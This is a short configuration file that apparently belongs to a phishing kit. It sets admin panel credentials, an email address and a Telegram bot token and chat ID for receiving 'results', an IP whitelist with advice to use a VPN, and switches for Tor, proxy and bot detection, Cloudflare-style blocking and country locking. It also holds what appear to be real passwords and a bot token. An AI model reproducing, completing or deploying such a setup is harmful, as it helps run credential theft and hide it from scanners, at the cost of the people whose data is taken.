
; Admin Panel Login
; Options: credentials

Username = "rhamon"
Password = "astute09"

; Your email for results
; Options: email address

Email = "rbryant@inbox.lv"

; Dont touch this

LoginTwice = "on"

; Whitelist your IP
; Use a VPN / Proxy !
; Options: IP or off

MyIP = "10.0.2.15"

; Proxy, Hosting, Tor detection
; Options: on or off

VPN = "off"

; Proxy, Hosting, Tor detection
; Not 100% reliable though
; Options: on or off

HeuristicVPN = "off"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "on"

; Allow access to a specific country
; Options: country code or off

CountryLock = "off"

;For telegram results added by ASTUTE
;Telegram added
telegram = "on"
chat_id = "5771100859"
bot_url = "6092965426:AAEGmrB5UnbV25ThoOtExAHL6WWCMYzQui8"
 


